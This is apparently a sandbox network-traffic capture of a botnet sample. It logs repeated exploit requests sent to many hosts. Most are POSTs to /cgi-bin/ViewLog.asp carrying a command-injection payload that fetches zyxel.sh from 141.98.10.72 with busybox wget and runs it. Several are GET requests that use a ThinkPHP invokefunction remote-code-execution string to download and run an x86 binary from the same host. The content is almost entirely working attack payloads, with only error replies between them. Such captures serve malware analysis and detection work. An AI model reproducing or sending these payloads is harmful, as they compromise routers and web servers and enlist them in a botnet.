                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:01.562922001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:04.282888889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:09.402818918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.386471033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.869829893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:20.824793100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      46192.168.2.153549894.121.147.1988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:59.937185049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      47192.168.2.155427894.120.211.2268080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:59.938929081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      48192.168.2.153293485.9.71.1548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:59.984225035 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:00.284061909 CET692INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:00 GMT
                                                      Server: Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/7.3.3
                                                      Vary: accept-language,accept-charset
                                                      Content-Length: 438
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 62 20 50 48 50 2f 37 2e 33 2e 33 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/7.3.3 Server at 192.168.0.14 Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      49192.168.2.1551420112.135.219.6880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:00.287610054 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      50192.168.2.1547730112.74.127.2280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:00.314832926 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:00.664943933 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.17.5
                                                      Date: Wed, 14 Feb 2024 08:29:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.17.5</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      51192.168.2.1552534112.74.59.15080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:00.651650906 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:00.993341923 CET318INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:00 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Via: HTTP/1.1 SLB.12
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      52192.168.2.1534772112.78.1.5780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.019005060 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:01.385454893 CET339INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 14 Feb 2024 08:29:01 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      53192.168.2.154222231.136.100.28080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.524863005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:02.203002930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:03.578881025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:06.330862045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:11.962687969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:22.970382929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.009812117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.064584970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      54192.168.2.155800095.163.71.1878080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.537231922 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:01.772744894 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:06 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      55192.168.2.153278894.120.214.1878080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.549957991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      56192.168.2.1555688112.105.38.9880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:01.649846077 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
